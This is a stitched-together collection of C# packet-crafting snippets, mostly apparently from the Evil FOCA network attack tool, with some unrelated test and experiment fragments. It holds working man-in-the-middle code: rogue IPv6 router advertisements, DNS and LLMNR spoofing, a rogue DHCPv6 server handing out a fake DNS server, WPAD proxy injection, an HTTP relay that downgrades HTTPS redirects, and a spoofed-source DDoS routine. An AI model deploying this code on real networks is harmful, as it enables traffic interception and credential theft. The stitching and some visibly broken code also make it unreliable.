IPv6Packet ipv6 = new IPv6Packet(IPsrc, IPdst);
ipv6.PayloadPacket = routerAdvertisement;
ipv6.HopLimit = 255;
EthernetPacket ethernet = new EthernetPacket(MACsrc, MACdst, EthernetPacketType.IpV6);
ethernet.PayloadPacket = ipv6;
Program.CurrentProject.data.SendPacket(ethernet);
}
}
}
Thread.Sleep(SendDoSAttackEachXSecs * 1000);
}
catch (ThreadAbortException)
{
return;
}
catch
{
}
}
}
private void device_OnPacketArrival(object sender, CaptureEventArgs e)
{
if (e.Device.LinkType != LinkLayers.Ethernet)
return;
var ethernetPacket = new EthernetPacket(new ByteArraySegment(e.Packet.Data));
var ipPacket = ethernetPacket.PayloadPacket as IpPacket;
if (ipPacket == null)
return;
OnPacketReceived(ipPacket);
var device = (WinPcapDevice) sender;
if (device.Statistics.DroppedPackets == _droppedPackets &&
device.Statistics.InterfaceDroppedPackets == _interfaceDroppedPackets) return;
_droppedPackets = device.Statistics.DroppedPackets;
_interfaceDroppedPackets = device.Statistics.InterfaceDroppedPackets;
File.AppendAllText("TCP",
$"DroppedPackets {device.Statistics.DroppedPackets}, InterfaceDroppedPackets {device.Statistics.InterfaceDroppedPackets}");
}
public override object[] Attack(string[] DDoSWork)
{
object[] obj = new object[2];
string sDestinationAddress = DDoSWork[0];
ushort tcpSourcePort = ushort.Parse(GetOpenPort());
ushort tcpDestinationPort = 53;
TcpPacket tcpPacket = new TcpPacket(tcpSourcePort, tcpDestinationPort);
IPAddress ipSourceAddress = System.Net.IPAddress.Parse(GetRandomIP());
IPAddress ipDestinationAddress = System.Net.IPAddress.Parse(sDestinationAddress);
IPv4Packet ipPacket = new IPv4Packet(ipSourceAddress, ipDestinationAddress);
string sourceHwAddress = "90-90-90-90-90-90";
var ethernetSourceHwAddress = System.Net.NetworkInformation.PhysicalAddress.Parse(sourceHwAddress);
string destionationHwAddress = "80-80-80-80-80-80";
var ethernetDestinationHwAdress = System.Net.NetworkInformation.PhysicalAddress.Parse(destionationHwAddress);
var ethernetPacket = new EthernetPacket(ethernetSourceHwAddress, ethernetDestinationHwAdress, EthernetPacketType.None);
ipPacket.PayloadPacket = tcpPacket;
ethernetPacket.PayloadPacket = ipPacket;
byte[] bPacket = new byte[75];
var devices = CaptureDeviceList.Instance;
int i = 0;
var device = null;
return obj;
}
public int sendPacket()
{
byte[] bytes = new byte[4096];
ByteArraySegment bas = new ByteArraySegment(bytes);
ushort srcPort = 23444;
ushort dstPort = 12345;
PacketDotNet.UdpPacket udpPacket = new UdpPacket(srcPort, dstPort);
string cmdString = "xxxxyyyyHello world!";
byte[] sendBuffer = Encoding.ASCII.GetBytes(cmdString);
udpPacket.PayloadData = sendBuffer;
ICMPv4Packet icmpPacket = new ICMPv4Packet(new ByteArraySegment(sendBuffer));
// sanity check:
//bas.BytesLength = 10;
//Console.WriteLine("bas - Offset = " + bas.Offset + " len= " + bas.Length);
IPAddress ipSrcAddr = System.Net.IPAddress.Parse("192.168.0.186"); // laptop
IPAddress ipDestAddr = System.Net.IPAddress.Parse("192.168.0.185"); // my linux box
IpPacket ipPacket = new IPv4Packet(ipSrcAddr, ipDestAddr);
ipPacket.PayloadPacket = udpPacket;
icmpPacket.TypeCode = ICMPv4TypeCodes.Unassigned1;
icmpPacket.Sequence = 1;
Console.WriteLine("icmpPacket - TypeCode = " + icmpPacket.TypeCode + " Sequence= " + icmpPacket.Sequence);
Console.WriteLine("icmpPacket : " + icmpPacket.PrintHex());
icmpPacket.UpdateCalculatedValues();
Console.WriteLine("icmpPacket : " + icmpPacket.PrintHex());
//ushort etype = 0xFF00; //EthernetPacketType RAW ?
System.Net.NetworkInformation.PhysicalAddress ethSrcAddr = System.Net.NetworkInformation.PhysicalAddress.Parse("02-1E-EC-8F-7F-E1");
System.Net.NetworkInformation.PhysicalAddress ethDstAddr = System.Net.NetworkInformation.PhysicalAddress.Parse("48-5B-39-ED-96-36");
EthernetPacket ethernetPacket = new EthernetPacket(ethSrcAddr, ethDstAddr, EthernetPacketType.IpV4);
// I thought "None" for type would fill in type automatically; but it remained zero on the wire and was flagged "Malformed"
ethernetPacket.PayloadPacket = icmpPacket;
Console.WriteLine("ethernetPacket : " + ethernetPacket.PrintHex());
ethernetPacket.Type = EthernetPacketType.IpV4;
Console.WriteLine("ethernetPacket : " + ethernetPacket.PrintHex());
//ipPacket.PayloadPacket = udpPacket;
//ethernetPacket.PayloadPacket = gmpPacket; //ipPacket;
ethernetPacket.UpdateCalculatedValues();
Console.WriteLine(ethernetPacket.ToString());
ipPacket.UpdateCalculatedValues();
//udpPacket.UpdateUDPChecksum();
// Experiment with raw ip packet?
ipPacket.Protocol = IPProtocolType.RAW;
// Why isn't ValidChecksum true?
//Console.WriteLine("After updating calculated values, ValidUDPChecksum = " + udpPacket.ValidUDPChecksum + " ValidChecksum = " + udpPacket.ValidChecksum);
//Console.WriteLine(ethernetPacket.ToString());
device.Open(DeviceMode.Normal, 15000); // 15 sec timeout
//ushort checksum = csum(ipPacket.BytesHighPerformance, ipPacket.P);
device.SendPacket(ethernetPacket);
return 0;
}
private void DNSCheck(Packet p)
{
EthernetPacket ethernet = (EthernetPacket)p;
if (p.PayloadPacket.PayloadPacket is UdpPacket)
{
UdpPacket udp = p.PayloadPacket.PayloadPacket as UdpPacket;
attacks.Where(a => a.attackType == AttackType.SlaacMitm).ToList().ForEach(currentAttack =>
{
MitmAttack mitmAttack = currentAttack as MitmAttack;
if (p.PayloadPacket is IPv6Packet)
{
switch (udp.DestinationPort)
{
case 53:
Heijden.DNS.Response response = new Heijden.DNS.Response(new IPEndPoint(IPAddress.Parse("1.2.3.4"), 53), udp.PayloadData);
var aaaaDns = (from q in response.Questions
where q.QType == Heijden.DNS.QType.AAAA || q.QType == Heijden.DNS.QType.A
select q).ToList();
//Para mostrar la pelotita de conexión a internet OK, respondemos al paquete Teredo de Microsoft en formato A.
var aTeredoDns = (from q in response.Questions
where q.QType == Heijden.DNS.QType.A
&& (q.QName.ToLower().Contains("teredo") || q.QName.ToLower().Contains("msftncsi"))
select q).ToList();
if (aaaaDns != null && aaaaDns.Count > 0)
{
DNS.IPv6Query query = new DNS.IPv6Query(udp.PayloadData);
string q = query.name;
IPAddress[] ips = Dns.GetHostAddresses(q);
DNS.IPv6Response resp = new DNS.IPv6Response(DNS.IPv6Query.Type.Ipv6, query.transID, query.nameDnsFormat, ips[0]);
byte[] respByteAr = resp.GeneratePacket();
EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4);
IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress);
UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort);
udpDns.PayloadData = respByteAr;
ipv6Dns.PayloadPacket = udpDns;
ethDns.PayloadPacket = ipv6Dns;
udpDns.UpdateCalculatedValues();
udpDns.UpdateUDPChecksum();
ipv6Dns.UpdateCalculatedValues();
Program.CurrentProject.data.SendPacket(ethDns);
}
else if (aTeredoDns != null && aTeredoDns.Count > 0)
{
DNS.IPv6Query query = new DNS.IPv6Query(udp.PayloadData);
string q = query.name;
IPAddress[] ips = Dns.GetHostAddresses(q);
DNS.IPv6Response resp = new DNS.IPv6Response(DNS.IPv6Query.Type.Ipv4, query.transID, query.nameDnsFormat, ips[0]);
byte[] respByteAr = resp.GeneratePacket();
EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4);
IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress);
UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort);
udpDns.PayloadData = respByteAr;
ipv6Dns.PayloadPacket = udpDns;
ethDns.PayloadPacket = ipv6Dns;
udpDns.UpdateCalculatedValues();
udpDns.UpdateUDPChecksum();
ipv6Dns.UpdateCalculatedValues();
Program.CurrentProject.data.SendPacket(ethDns);
}
break;
case 5355:
LLMNR.LLMNRPacket llmnr = new LLMNR.LLMNRPacket();
llmnr.ParsePacket(udp.PayloadData);
if (llmnr.Query.Type.HasValue && llmnr.Query.Type.Value == LLMNR.DNSType.AAAA)
{
IPAddress[] ips = (from ip in Dns.GetHostAddresses(llmnr.Query.Name)
where ip.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork
select ip).ToArray();
byte[] ipv6Addr = new byte[] { 0x00,0x64, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0xff,0xff,
(byte)ips[0].GetAddressBytes()[0],(byte)ips[0].GetAddressBytes()[1],
(byte)ips[0].GetAddressBytes()[2] ,(byte)ips[0].GetAddressBytes()[3] };
llmnr.AnswerList.Add(new LLMNR.DNSAnswer()
{
Class = evilfoca.LLMNR.DNSClass.IN,
Name = llmnr.Query.Name,
Type = evilfoca.LLMNR.DNSType.AAAA,
RData = ipv6Addr,
RDLength = (short)ipv6Addr.Length
});
EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4);
IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress);
UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort);
udpDns.PayloadData = llmnr.BuildPacket();
ipv6Dns.PayloadPacket = udpDns;
ethDns.PayloadPacket = ipv6Dns;
udpDns.UpdateCalculatedValues();
udpDns.UpdateUDPChecksum();
ipv6Dns.UpdateCalculatedValues();
Program.CurrentProject.data.SendPacket(ethDns);
}
break;
default:
break;
}
}
});
}
}
unsafe public void AnalyzePacket(WinPcapDevice device, Packet p)
{
if (p.PayloadPacket == null || p.PayloadPacket.PayloadPacket == null || !(p.PayloadPacket.PayloadPacket is UdpPacket))
return;
UdpPacket udp = (UdpPacket)p.PayloadPacket.PayloadPacket;
if (udp.ParentPacket == null)
return;
if (!(udp.ParentPacket is IPv6Packet))
return;
if (attacks.Where(A => A.attackType == AttackType.DHCPIpv6).Count() == 0)
return;
DhcpIPv6 attack = (DhcpIPv6)attacks.Where(A => A.attackType == AttackType.DHCPIpv6).First();
IPv6Packet packetIpLayer = (IPv6Packet)udp.ParentPacket;
EthernetPacket ethernet = (EthernetPacket)p;
/*
Info: http://en.wikipedia.org/wiki/DHCPv6
Example
In this example, the server's link-local address is fe80::0011:22ff:fe33:5566/64 and the client's link-local address is fe80::aabb:ccff:fedd:eeff/64.
DHCPv6 client sends a Solicit from [fe80::aabb:ccff:fedd:eeff]:546 for [ff02::1:2]:547.
DHCPv6 server replies with an Advertise from [fe80::0011:22ff:fe33:5566]:547 for [fe80::aabb:ccff:fedd:eeff]:546.
DHCPv6 client replies with a Request from [fe80::aabb:ccff:fedd:eeff]:546 for [ff02::1:2]:547. (All client messages are sent to the multicast address, per section 13 of RFC 3315.)
DHCPv6 server finishes with a Reply from [fe80::0011:22ff:fe33:5566]:547 for [fe80::aabb:ccff:fedd:eeff]:546.
*/
DHCPv6Packet pa = new DHCPv6Packet();
pa.ParsePacket(udp.PayloadData);
if (packetIpLayer.DestinationAddress.Equals(IPAddress.Parse("ff02::1:2")))
{
EthernetPacket newPEthernet = new EthernetPacket(device.Interface.MacAddress,
ethernet.SourceHwAddress,
EthernetPacketType.IpV6);
UdpPacket newUDP = null;
IPAddress ipv6LocalLink = null;
IPv6Packet newIpv6 = null;
switch (pa.MessageType)
{
case DHCPv6Type.Solicit:
if (pa.Options.ContainsKey(DHCPv6OptionCode.ClientIdentifier) && pa.Options.ContainsKey(DHCPv6OptionCode.IANA))
{
newUDP = new UdpPacket(547, 546);
byte[] iaid = pa.Options[DHCPv6OptionCode.IANA].Value;
pa.MessageType = DHCPv6Type.Advertise;
pa.Options.Remove(DHCPv6OptionCode.ElapsedTime);
pa.Options.Remove(DHCPv6OptionCode.FQDM);
pa.Options.Remove(DHCPv6OptionCode.VendorClass);
pa.Options.Remove(DHCPv6OptionCode.OptionRequest);
pa.Options.Remove(DHCPv6OptionCode.IANA);
pa.AddServerIdentifierOption(device.MacAddress);
pa.AddIANAOption(IPAddress.Parse(string.Format("{0}:{1}", attack.fakeIPRange.ToString().Substring(0, attack.fakeIPRange.ToString().LastIndexOf(':')), IpID)), iaid);
pa.AddDNSOption(attack.fakeDns);
pa.AddDomainSearchListOption(new string[] { "google.com" });
IpID++;
newUDP.PayloadData = pa.BuildPacket();
ipv6LocalLink = IPAddress.Parse(Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(device).ToString());
newIpv6 = new IPv6Packet(ipv6LocalLink, packetIpLayer.SourceAddress);
newIpv6.HopLimit = 1;
newIpv6.PayloadPacket = newUDP;
newPEthernet.PayloadPacket = newIpv6;
newUDP.UpdateCalculatedValues();
newUDP.UpdateUDPChecksum();
Program.CurrentProject.data.SendPacket(newPEthernet);
}
break;
case DHCPv6Type.Request:
newUDP = new UdpPacket(547, 546);
pa.MessageType = DHCPv6Type.Reply;
pa.Options.Remove(DHCPv6OptionCode.ElapsedTime);
pa.Options.Remove(DHCPv6OptionCode.FQDM);
pa.Options.Remove(DHCPv6OptionCode.VendorClass);
pa.Options.Remove(DHCPv6OptionCode.OptionRequest);
pa.Options.Remove(DHCPv6OptionCode.DNS);
pa.AddDNSOption(attack.fakeDns);
pa.AddDomainSearchListOption(new string[] { "google.com" });
newUDP.PayloadData = pa.BuildPacket();
ipv6LocalLink = IPAddress.Parse(Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(device).ToString());
newIpv6 = new IPv6Packet(ipv6LocalLink, packetIpLayer.SourceAddress);
newIpv6.HopLimit = 1;
newIpv6.PayloadPacket = newUDP;
newPEthernet.PayloadPacket = newIpv6;
newUDP.UpdateCalculatedValues();
newUDP.UpdateUDPChecksum();
Program.CurrentProject.data.SendPacket(newPEthernet);
break;
case DHCPv6Type.InformationRequest:
newUDP = new UdpPacket(547, 546);
pa.MessageType = DHCPv6Type.Reply;
pa.Options.Remove(DHCPv6OptionCode.ElapsedTime);
pa.Options.Remove(DHCPv6OptionCode.FQDM);
pa.Options.Remove(DHCPv6OptionCode.VendorClass);
pa.Options.Remove(DHCPv6OptionCode.OptionRequest);
pa.Options.Remove(DHCPv6OptionCode.IANA);
pa.AddServerIdentifierOption(device.MacAddress);
pa.AddDNSOption(attack.fakeDns);
pa.AddDomainSearchListOption(new string[] { "google.com" });
newUDP.PayloadData = pa.BuildPacket();
ipv6LocalLink = IPAddress.Parse(Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(device).ToString());
newIpv6 = new IPv6Packet(ipv6LocalLink, packetIpLayer.SourceAddress);
newIpv6.HopLimit = 1;
newIpv6.PayloadPacket = newUDP;
newPEthernet.PayloadPacket = newIpv6;
newUDP.UpdateCalculatedValues();
newUDP.UpdateUDPChecksum();
Program.CurrentProject.data.SendPacket(newPEthernet);
break;
default:
break;
}
}
}
public void SendWpadFile(Packet packet)
{
lock (locker)
{
if (packet is EthernetPacket)
{
EthernetPacket ethPacket = packet as EthernetPacket;
IPv6Packet ipv6Source = (IPv6Packet)packet.PayloadPacket;
if (ipv6Source.PayloadPacket is PacketDotNet.TcpPacket)
{
TcpPacket tcp = ipv6Source.PayloadPacket as TcpPacket;
string element = string.Format("{0}/{1}", tcp.SequenceNumber, tcp.AcknowledgmentNumber);
ushort destPort = tcp.SourcePort;
ushort sourcePort = tcp.DestinationPort;
IPAddress destAddress = ipv6Source.SourceAddress;
IPAddress sourceAddress = ipv6Source.DestinationAddress;
PhysicalAddress sourceMac = Program.CurrentProject.data.GetDevice().MacAddress;
PhysicalAddress destMac = ethPacket.SourceHwAddress;
tcp.SourcePort = sourcePort;
tcp.DestinationPort = destPort;
if (tcp.Syn && !tcp.Ack && !tcp.Rst && tcp.PayloadData.Length == 0 && sourcePort == 80)
{
tcp.Ack = true;
tcp.AcknowledgmentNumber = tcp.SequenceNumber + 1;
tcp.SequenceNumber = tcp.SequenceNumber + 38;
tcp.WindowSize = 14600;
IPv6Packet ipv6Ack = new IPv6Packet(sourceAddress, destAddress);
ipv6Ack.PayloadPacket = tcp;
EthernetPacket eth = new EthernetPacket(sourceMac, destMac, EthernetPacketType.IpV6);
eth.PayloadPacket = ipv6Ack;
(eth.PayloadPacket.PayloadPacket as TcpPacket).UpdateTCPChecksum();
Program.CurrentProject.data.SendPacket(eth);
}
else if (!tcp.Syn && tcp.Ack && tcp.PayloadData != null && !tcp.Rst && tcp.PayloadData.Length > 0 && sourcePort == 80)
{
if (Data.Data.WpadReqList.Contains(element))
return;
Data.Data.WpadReqList.Add(element);
HttpPacket http = new HttpPacket(((TcpPacket)(packet.PayloadPacket.PayloadPacket)).PayloadData);
if (http.FullUrlRequest.Contains("wpad.dat"))
{
tcp.Psh = true;
tcp.Fin = true;
tcp.Ack = true;
tcp.SequenceNumber = (ipv6Source.PayloadPacket as TcpPacket).AcknowledgmentNumber;
tcp.AcknowledgmentNumber = tcp.SequenceNumber;
string jsFunction = string.Format("function FindProxyForURL(url, host){{return \"PROXY [{0}]:{1}\";}}", ipv6Source.DestinationAddress.ToString(), proxyPort);
string htmlHeader = string.Format("HTTP/1.1 200 OK\r\nContent-Type: application/x-ns-proxy-autoconfig\r\nContent-Length: {0}\r\n\r\n", jsFunction.Length);
tcp.PayloadData = System.Text.Encoding.UTF8.GetBytes(string.Concat(htmlHeader, jsFunction));
EthernetPacket eth = new EthernetPacket(ethPacket.DestinationHwAddress, ethPacket.SourceHwAddress, EthernetPacketType.IpV6);
IPv6Packet ip6 = new IPv6Packet(ipv6Source.DestinationAddress, ipv6Source.SourceAddress);
ip6.PayloadPacket = tcp;
eth.PayloadPacket = ip6;
(eth.PayloadPacket.PayloadPacket as TcpPacket).UpdateTCPChecksum();
Program.CurrentProject.data.SendPacket(eth);
}
}
else if (tcp.Fin && tcp.Ack && !tcp.Rst && tcp.PayloadData.Length == 0)
{
tcp.Ack = true;
tcp.Fin = false;
uint ackOrg = tcp.AcknowledgmentNumber;
tcp.AcknowledgmentNumber = tcp.SequenceNumber + 1;
tcp.SequenceNumber = ackOrg;
tcp.WindowSize = 1400;
IPv6Packet ipv6Ack = new IPv6Packet(sourceAddress, destAddress);
ipv6Ack.PayloadPacket = tcp;
EthernetPacket eth = new EthernetPacket(sourceMac, destMac, EthernetPacketType.IpV6);
eth.PayloadPacket = ipv6Ack;
(eth.PayloadPacket.PayloadPacket as TcpPacket).UpdateTCPChecksum();
Program.CurrentProject.data.SendPacket(eth);
}
}
}
}
}
// create ARP reply packet (sender IP, target IP, target MAC, specific source MAC)
private EthernetPacket GenerateARPReply(string senderIP, string targetIP, PhysicalAddress targetMAC, PhysicalAddress sourceMAC)
{
var ethernetPacket = new EthernetPacket(physicalAddress, targetMAC, EthernetPacketType.Arp);
var arpPacket = new ARPPacket(ARPOperation.Response, targetMAC, IPAddress.Parse(targetIP), sourceMAC, IPAddress.Parse(senderIP));
ethernetPacket.PayloadPacket = arpPacket;
return ethernetPacket;
}
// create multicast IPv6 ping packet
private EthernetPacket GenerateIpv6Ping()
{
var ethernetPacket = new EthernetPacket(physicalAddress, broadcastMAC, EthernetPacketType.Arp);
var ipv6Packet = new IPv6Packet(IPAddress.Parse((deviceInfo.IPv6 != string.Empty ? deviceInfo.IPv6 : deviceInfo.LinkLocal)), IPAddress.Parse("ff02::1"));
ipv6Packet.NextHeader = IPProtocolType.ICMPV6;
ethernetPacket.PayloadPacket = ipv6Packet;
var icmpv6Packet = new ICMPv6Packet(new ByteArraySegment(new byte[40]))
{
Type = ICMPv6Types.EchoRequest,
PayloadData = Encoding.ASCII.GetBytes("abcdefghijklmnopqrstuvwabcdefghi")
};
ipv6Packet.PayloadPacket = icmpv6Packet;
// ICMPv6 checksum fix
var pseudo = Network.GetPseudoHeader(ipv6Packet.SourceAddress, ipv6Packet.DestinationAddress, icmpv6Packet.Bytes.Length, 58);
icmpv6Packet.Checksum = (ushort)(ChecksumUtils.OnesComplementSum(pseudo.Concat(icmpv6Packet.Bytes).ToArray()) + 4);
return ethernetPacket;
}
private void SendHttpResponse(HttpPacket httpReq, EthernetPacket orgEthPacket, ushort sourcePort, ushort destinationPort, uint ackNumber, uint expectedSeqNumber)
{
IPv6Packet ipv6 = (IPv6Packet)orgEthPacket.PayloadPacket;
TcpPacket tcp = new TcpPacket(sourcePort, destinationPort);
IPAddress destAddress = ipv6.SourceAddress;
IPAddress sourceAddress = ipv6.DestinationAddress;
PhysicalAddress sourceMac = device.MacAddress;
PhysicalAddress destMac = orgEthPacket.SourceHwAddress;
string urlRequest = string.IsNullOrEmpty(httpReq.Host) ? string.Format("http://{0}{1}", Ipv6To4Addr(ipv6.DestinationAddress.ToString()), httpReq.ResourceRequest) : httpReq.FullUrlRequest;
bool validRequest = false;
HttpWebRequest req = null;
HttpWebResponse response = null;
IPv6Packet ipv6Ack = null;
EthernetPacket eth = null;
CookieContainer lastCookies = httpReq.Cookies;
string userAgent = httpReq.UserAgent;
int repeatRedirect = 0;
//Fix no Google's javascript redirect
if (httpReq.Host.Contains("google") && httpReq.FullUrlRequest.Contains("/xjs/_/js/"))
validRequest = true;
while (!validRequest)
{
req = HttpWebRequest.Create(urlRequest) as HttpWebRequest;
req.Host = req.Address.Host;
req.UserAgent = userAgent;
req.Method = httpReq.Method;
//req.Accept = httpReq.Accept;
req.Headers[HttpRequestHeader.AcceptLanguage] = httpReq.AcceptLanguage;
req.Referer = httpReq.Referer;
req.AllowAutoRedirect = false;
if (lastCookies == null)
lastCookies = new CookieContainer();
req.CookieContainer = lastCookies;
if (httpReq.Method.ToLower() == "post" && httpReq.Data != null)
{
req.ContentType = httpReq.ContentType;
req.ContentLength = httpReq.Data.Length;
using (Stream dataStream = req.GetRequestStream())
{
using (BinaryWriter writer = new BinaryWriter(dataStream))
{
writer.Write(httpReq.Data);
}
}
}
try
{
response = req.GetResponse() as HttpWebResponse;
if ((response.StatusCode == HttpStatusCode.Found || response.StatusCode == HttpStatusCode.Moved) && response.Headers[HttpResponseHeader.Location].StartsWith("https"))
throw new WebException("302", null, WebExceptionStatus.UnknownError, response);
else
validRequest = true;
}
catch (WebException ex404)
{
if (ex404.Message.Contains("404") && ex404.Response != null)
{
if ((ex404.Response as HttpWebResponse) != null)
response = (ex404.Response as HttpWebResponse);
validRequest = true;
}
else if (ex404.Message.Contains("403") && ex404.Response.ResponseUri.AbsoluteUri.StartsWith("http:"))
{
validRequest = false;
urlRequest = string.Format("https{0}", ex404.Response.ResponseUri.AbsoluteUri.Substring(4));
if (!string.IsNullOrEmpty(ex404.Response.Headers[HttpResponseHeader.SetCookie]))
{
CookieCollection col = HttpPacket.ParseSetCookies(ex404.Response.Headers[HttpResponseHeader.SetCookie]);
if (col.Count > 0)
{
if (!string.IsNullOrEmpty(col[0].Domain))
{
string domain = col[0].Domain;
if (domain.StartsWith("."))
domain = domain.Remove(0, 1);
lastCookies.Add(new Uri(string.Format("http://{0}", domain)), col);
}
else
lastCookies.Add(ex404.Response.ResponseUri, col);
}
}
}
else if (ex404.Message.Contains("302"))
{
if (repeatRedirect < REDIRECTCOUNT)
{
validRequest = false;
urlRequest = ex404.Response.Headers[HttpResponseHeader.Location];
if (!string.IsNullOrEmpty(ex404.Response.Headers[HttpResponseHeader.SetCookie]))
{
CookieCollection col = HttpPacket.ParseSetCookies(ex404.Response.Headers[HttpResponseHeader.SetCookie]);
if (col.Count > 0)
{
if (!string.IsNullOrEmpty(col[0].Domain))
{
string domain = col[0].Domain;
if (domain.StartsWith("."))
domain = domain.Remove(0, 1);
if (urlRequest.StartsWith("https"))
lastCookies.Add(new Uri(string.Format("https://{0}", domain)), col);
else
lastCookies.Add(new Uri(string.Format("http://{0}", domain)), col);
}
else
lastCookies.Add(ex404.Response.ResponseUri, col);
}
}
repeatRedirect++;
}
else
{
validRequest = true;
response = null;
}
}
else
{
validRequest = true;
}
}
catch (Exception)
{
}
}
int previousLength = 0;
uint ackValue = expectedSeqNumber;
uint sequence = ackNumber;
if (response != null)
{
try
{
foreach (var item in response.GetBytes(1300))
{
tcp.Psh = false;
tcp.Fin = false;
tcp.Ack = true;
tcp.AcknowledgmentNumber = ackValue;
tcp.SequenceNumber = sequence + (uint)previousLength;
sequence = tcp.SequenceNumber;
previousLength = item.Length;
tcp.WindowSize = 1600;
tcp.PayloadData = item;
ipv6Ack = new IPv6Packet(sourceAddress, destAddress);
ipv6Ack.PayloadPacket = tcp;
eth = new EthernetPacket(sourceMac, destMac, EthernetPacketType.IpV6);
eth.PayloadPacket = ipv6Ack;
(eth.PayloadPacket.PayloadPacket as TcpPacket).UpdateTCPChecksum();
Program.CurrentProject.data.SendPacket(eth);
}
}
catch (Exception e)
{
e.ToString();
}
tcp.Psh = true;
tcp.Fin = true;
tcp.Ack = true;
tcp.AcknowledgmentNumber = ackValue;
tcp.SequenceNumber = sequence + (uint)previousLength;
tcp.WindowSize = 1600;
tcp.PayloadData = new byte[0];
ipv6Ack = new IPv6Packet(sourceAddress, destAddress);
ipv6Ack.PayloadPacket = tcp;
eth = new EthernetPacket(sourceMac, destMac, EthernetPacketType.IpV6);
eth.PayloadPacket = ipv6Ack;
(eth.PayloadPacket.PayloadPacket as TcpPacket).UpdateTCPChecksum();
Program.CurrentProject.data.SendPacket(eth);
}
else
{
tcp.Psh = true;
tcp.Fin = true;
tcp.Ack = true;
tcp.AcknowledgmentNumber = ackValue;
tcp.SequenceNumber = sequence + (uint)previousLength;
tcp.WindowSize = 1600;
tcp.PayloadData = HttpPacket.Get404Packet();
ipv6Ack = new IPv6Packet(sourceAddress, destAddress);
ipv6Ack.PayloadPacket = tcp;
eth = new EthernetPacket(sourceMac, destMac, EthernetPacketType.IpV6);
eth.PayloadPacket = ipv6Ack;
(eth.PayloadPacket.PayloadPacket as TcpPacket).UpdateTCPChecksum();
Program.CurrentProject.data.SendPacket(eth);
}
}
private void Attack()
{
while (true)
{
try
{
/* INICIAR EL ATAQUE MODIFICANDO LA CACHE ARP (DoS IPv4) Y LAS TABLAS DE VECINOS (IPv6 SLAAC) */
foreach (Data.Attack attack in attacks.Where(A => A.attackType == Data.AttackType.SlaacMitm && A.attackStatus == Data.AttackStatus.Attacking))
{
if (attack is evilfoca.Data.MitmAttack)
{
evilfoca.Data.MitmAttack slaacMitm = (evilfoca.Data.MitmAttack)attack;
EthernetPacket ethernet;
{
IPAddress myIP = Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(Program.CurrentProject.data.GetDevice());
PhysicalAddress myMac = Program.CurrentProject.data.GetDevice().MacAddress;
// IPv6 (de vinculo local) y MAC atacada
IPAddress IPdst = slaacMitm.t2.ip;
PhysicalAddress MACdst = slaacMitm.t2.mac;
ICMPv6Packet routerAdvertisement = new ICMPv6Packet(new ByteArraySegment(new ICMPv6.NeighborRouterAdvertisement(myMac, slaacMitm.prefix, false).GetBytes()));
IPv6Packet ipv6 = new IPv6Packet(myIP, IPdst);
ipv6.PayloadPacket = routerAdvertisement;
ipv6.HopLimit = 255;
ethernet = new EthernetPacket(myMac, MACdst, EthernetPacketType.IpV6);
ethernet.PayloadPacket = ipv6;
Program.CurrentProject.data.SendPacket(ethernet);
}
}
}
/* PARAR ATAQUE Y RESTAURAR LA CACHE DNS Y TABLAS DE VECINOS */
foreach (Data.Attack attack in attacks.Where(A => A.attackType == Data.AttackType.SlaacMitm && A.attackStatus == Data.AttackStatus.Stopping))
{
if (attack is evilfoca.Data.MitmAttack)
{
evilfoca.Data.MitmAttack slaacMitm = (evilfoca.Data.MitmAttack)attack;
/* Enviar paquetes para que pare la denegacion de servicio IPv4 */
/* Enviar paquetes para que pare el envenenamiento de vecino IPv6 */
attack.attackStatus = Data.AttackStatus.Stop;
}
}
Thread.Sleep(SendPacketEachXSecs * 1000);
}
catch
{
}
}
}
public void EthernetConstructorFromMacAddresses()
{
var srcHwAddressBytes = new Byte[EthernetFields.MacAddressLength];
for(int i = 0; i < srcHwAddressBytes.Length; i++)
{
srcHwAddressBytes[i] = (byte)i;
}
var dstHwAddressBytes = new Byte[EthernetFields.MacAddressLength];
for(int i = 0; i < dstHwAddressBytes.Length; i++)
{
dstHwAddressBytes[i] = (byte)(dstHwAddressBytes.Length - i);
}
var srcHwAddress = new PhysicalAddress(srcHwAddressBytes);
var dstHwAddress = new PhysicalAddress(dstHwAddressBytes);
var ethernetPacket = new EthernetPacket(srcHwAddress,
dstHwAddress,
EthernetPacketType.None);
int expectedLength = 14;
Assert.AreEqual(expectedLength, ethernetPacket.Bytes.Length);
//TODO: improve this here
Console.WriteLine("ethernetPacket.ToString() {0}",
ethernetPacket.ToString());
}
private void _CheckIfNeighborRoutesPackets(Neighbor n)
{
if (n == null)
return;
IPAddress IpSrc = Program.CurrentProject.data.GetIPv4FromDevice(device);
if (IpSrc == null)
return;
n.canRoutePackets = RouteStatus.Verifing;
EthernetPacket eth = new EthernetPacket(Program.CurrentProject.data.GetDevice().MacAddress, n.physicalAddress, EthernetPacketType.IpV4);
IPAddress IpDst = IPAddress.Parse("8.8.8.8");
eth.PayloadPacket = new IPv4Packet(IpSrc, IpDst);
eth.PayloadPacket.PayloadPacket = new TcpPacket((ushort)31337, (ushort)53);
((IPv4Packet)eth.PayloadPacket).UpdateIPChecksum();
((TcpPacket)eth.PayloadPacket.PayloadPacket).Syn = true;
((TcpPacket)eth.PayloadPacket.PayloadPacket).UpdateTCPChecksum();
Thread t = new Thread(new ParameterizedThreadStart(CheckIfRouted));
t.IsBackground = true;
t.Start(n);
Program.CurrentProject.data.SendPacket(eth);
}
public packet(RawCapture pac)
{
